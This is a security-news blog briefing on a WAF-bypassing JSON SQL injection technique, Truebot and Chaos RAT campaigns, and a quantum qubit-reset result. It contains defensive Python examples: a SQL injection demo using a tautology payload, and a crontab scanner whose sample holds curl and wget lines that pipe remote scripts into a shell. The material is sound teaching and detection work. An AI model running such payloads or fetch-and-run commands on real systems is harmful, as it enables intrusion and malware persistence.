Blog entry by Les Bell

by Les Bell - Tuesday, December 13, 2022, 8:12 AM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


JSON Allows SQL Injection to Bypass Web Application Firewalls

Claroty's Team82 has developed a generic technique which allowed them to bypass web application firewalls while delivering SQL injection payloads.

SQL injection remains one of the leading vulnerabilities in web applications, in large part because of the constant demand for web developers who, without proper security education, copy code fragments from sites like Stack Overflow without realising that these are just that: fragments intended to demonstrate a technique, not fully-formed code ready to be pasted into a finished application. (A 2018 study suggested that roughly 50% of answers to PHP questions contain SQL injection vulnerabilities.)

The correct fix, of course, is to educate developers, but in the meantime most sites depend on web application firewalls, which can detect and block a range of attacks on web applications. However, the technique developed by Team82 works by prepending JSON syntax to the SQL injection payloads, and because many WAFs lack JSON support (even though databases added JSON support many years ago) this throws the WAF's parser for a loop, allowing the SQL injection to pass.

The technique worked on all but one WAF the researchers tested, and after they notified the vendors, their products have had JSON support added. The Team82 researchers also added support for the technique to the popular SQLMap open-source exploitation tool, for use by penetration testers.
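To make the "correct fix" concrete, here is an added example (mine, not code from the article or from Claroty's research) contrasting the copy-pasted concatenation pattern with a parameterised query. It uses Python's sqlite3 module with a constructed in-memory users table and the textbook tautology payload rather than the JSON variant the article describes; the point it makes is that a bound parameter is never parsed as SQL, so the hardened version is indifferent to whatever syntax a payload carries, which is exactly why parameterisation, not a WAF signature, is the fix.

```python
import sqlite3
from typing import List

# Constructed sample rows for the demonstration; not data from the article.
USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "letmein")]


def make_db() -> sqlite3.Connection:
    """Build an in-memory users table populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> List[str]:
    """The Stack-Overflow-fragment pattern: user input is spliced into the SQL
    text, so whatever the user types becomes part of the query's syntax."""
    sql = (
        f"SELECT name FROM users WHERE name = '{name}' "
        f"AND password = '{password}' ORDER BY name"
    )
    return [row[0] for row in conn.execute(sql)]


def login_parameterised(conn: sqlite3.Connection, name: str, password: str) -> List[str]:
    """The fix: the query text is fixed at development time and the inputs
    travel as bound parameters, which the database compares as plain values
    and never parses as SQL, no matter what syntax they contain."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ? ORDER BY name"
    return [row[0] for row in conn.execute(sql, (name, password))]


def demo() -> dict:
    """Run both versions against a valid login and a classic tautology payload."""
    conn = make_db()
    payload = "' OR '1'='1"  # closes the quoted literal and appends a true clause
    return {
        "valid_vulnerable": login_vulnerable(conn, "alice", "s3cret"),
        "valid_parameterised": login_parameterised(conn, "alice", "s3cret"),
        # Concatenation: the clause becomes ... AND password = '' OR '1'='1'
        # and every row matches, i.e. authentication is bypassed.
        "injected_vulnerable": login_vulnerable(conn, "alice", payload),
        # Parameterised: the payload is compared literally against the
        # password column, matches nothing, and the login fails.
        "injected_parameterised": login_parameterised(conn, "alice", payload),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Note that the parameterised version needs no input filtering at all: a WAF in front of `login_vulnerable` has to recognise every syntax the database might accept, which is the gap Team82 exploited, whereas `login_parameterised` simply has no code path in which input is interpreted as SQL.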

Moshe, Noam, {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF, blog post, 8 December 2022. Available online at https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf.

Laurent22, Potential SQL injections vulnerabilities in Stack Overflow PHP questions, automated analysis report, July 2018. Available online at https://laurent22.github.io/so-injections/.

New Waves of Truebot Attacks

Cisco Talos security researchers are reporting an increase in infections by Truebot (also known as Silence.Downloader). Previously, Truebot has been spread via malmails and mainly infected desktop/laptop systems inside corporate networks. The new wave is using two new initial infection mechanisms.

In August, the researchers noticed a small number of cases in which Truebot was run following the exploitation of a vulnerability in the IT asset management product Netwrix Auditor; since this tool is not widely used on Internet-facing systems, the infection remained limited. In October, however, a second wave of infection started, this time delivered via Raspberry Robin malware, which usually spreads via USB drives. Between them, these two infection vectors have assembled a botnet of over 1,000 systems worldwide, with a particular focus on Mexico, Brazil and Pakistan. Since November, the attackers have switched to an as-yet-unknown delivery mechanism which has infected over 500 Internet-facing Windows servers in the US, Canada and Brazil.

Post-compromise, the current versions of Truebot download either Cobalt Strike reverse shell or Grace malware payloads, typically followed by a custom 'Teleport' exfiltration tool. However, in some cases, the threat actors go on to deploy Clop ransomware as part of a double extortion attack.

These campaigns seem to involve two different groups: Silence Group, who are originally responsible for Truebot, and TA505, a.k.a. Evil Corp, who are associated with the Grace malware.

Pereira, Tiago, Breaking the silence - Recent Truebot activity, threat advisory, 8 December 2022. Available online at https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/.

Linux Servers Targeted for Cryptomining and More With Chaos RAT

For some time, cryptojacking threat groups have been targeting Linux instances in the cloud, generally using the same sequence of actions after gaining initial access: kill off any competing malware and security products, establish persistence and then execute a Monero cryptominer. But in November Trend Micro researchers observed a new pattern of activity: in this case, a remote access trojan called Chaos (Trojan.Linux.CHAOSRAT) is installed along with the XMRig miner.

The infection maintains persistence by setting up a cron job which re-downloads and reinstalls the malware from Pastebin every 10 minutes, and it also installs itself in several different locations to further evade removal. The server from which the other payloads are downloaded is hosted in Russia, but once the Chaos RAT is installed it connects to a C2 server which appears to be in Hong Kong, reporting the detailed configuration of the infected machine.

The RAT is written in Go and has quite comprehensive capabilities: it can provide a reverse shell, upload, download and delete files, take screenshots, and restart or shut down the computer. This suggests that the threat actor is considering broadening their activities beyond cloud-based cryptomining.
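The persistence mechanism described above (a cron job that periodically re-fetches the malware from a paste site) leaves a recognisable footprint in crontab files, so here is an added detection example (mine, not code from the article or from Trend Micro) that reviews crontab entries for that pattern. The sample crontab, the paste-site list and the 203.0.113.10 address are all constructed for the demonstration and are not indicators from the report; the heuristics (remote fetch piped into a shell, a paste-site source, a schedule that fires more than once an hour) are my own generalisation of what the article describes.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample crontab; the paste id and IP are placeholders, not real IoCs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE_PASTE_ID | sh
*/5 * * * * wget -q -O- http://203.0.113.10/update.sh | bash
30 6 * * 1 /usr/local/bin/backup.sh
"""

# Illustrative list; the article names Pastebin, other paste services are assumed.
PASTE_HOSTS = ("pastebin.com",)

# A curl/wget invocation followed (before any pipe or separator) by a URL; group 2 is the host.
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;&]*https?://([^\s/]+)", re.IGNORECASE)
# Output piped straight into an interpreter shell.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")


@dataclass
class Finding:
    line: str
    reasons: List[str]


def runs_more_than_hourly(minute_field: str) -> bool:
    """True when the minute field fires several times per hour: '*', '*/N' or a list."""
    return minute_field == "*" or minute_field.startswith("*/") or "," in minute_field


def parse_crontab_line(line: str) -> Optional[Tuple[List[str], str]]:
    """Split a crontab line into its five schedule fields and the command.
    Comments, blank lines and malformed entries yield None."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    parts = stripped.split(None, 5)
    if len(parts) < 6:
        return None
    return parts[:5], parts[5]


def assess_crontab(text: str) -> List[Finding]:
    """Return one Finding per entry that matches any re-download persistence heuristic."""
    findings: List[Finding] = []
    for line in text.splitlines():
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons: List[str] = []
        fetch = FETCH_RE.search(command)
        if fetch:
            host = fetch.group(2).lower()
            if any(host == p or host.endswith("." + p) for p in PASTE_HOSTS):
                reasons.append(f"downloads from paste site {host}")
            if runs_more_than_hourly(schedule[0]):
                reasons.append(f"re-fetches remote content more than hourly (minute field {schedule[0]})")
        if PIPE_TO_SHELL_RE.search(command):
            reasons.append("pipes downloaded content directly into a shell")
        if reasons:
            findings.append(Finding(line.strip(), reasons))
    return findings


if __name__ == "__main__":
    for f in assess_crontab(SAMPLE_CRONTAB):
        print(f.line)
        for r in f.reasons:
            print("   -", r)
```

On a real host the same function would be run over `/etc/crontab`, `/etc/cron.d/*` and each user's crontab (`crontab -l -u <user>`); because the article notes the malware also copies itself to several locations, a hit here is a prompt to collect every path the command references rather than just delete the entry.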

Fiser, David and Alfredo Oliveira, Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT, blog post, 12 December 2022. Available online at https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html.

UNSW Resets Qbits With Maxwell's Daemon

A story that slipped under our radar for a while: Every student who studies thermodynamics encounters Maxwell's Daemon, a thought-experiment daemon which, by opening a door between two chambers when a highly-excited particle approaches it and closing the door to slow ones, can create a temperature difference between the two, thereby driving a heat engine and achieving - in theory - perpetual motion. Such a daemon is impossible, of course - the daemon itself needs to consume energy to observe the particles and move the door.

But in a modern twist on the idea, quantum computing engineers at University of New South Wales have achieved something similar, using a fast digital voltmeter to observe the temperature of electrons drawn from a warm pool of electrons. In doing so, they make the electron much cooler than the pool it came from, which corresponds to it being in the '0' state.

This is the basis of their new technique for resetting the state of electron spin silicon qubits. The old technique works by cooling electrons to a temperature near absolute zero, and hoping that all the electrons 'relax' to the '0' state, but this still leaves a 20% probability that the electron will be a '1'. The new technique reduces the probability of error to 1% - a major step in improving the reliability of quantum computers.

UNSW Media, New quantum computing feat is a modern twist on a 150-year-old thought experiment, news release, 30 November 2022. Available online at https://newsroom.unsw.edu.au/news/science-tech/new-quantum-computing-feat-modern-twist-150-year-old-thought-experiment.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
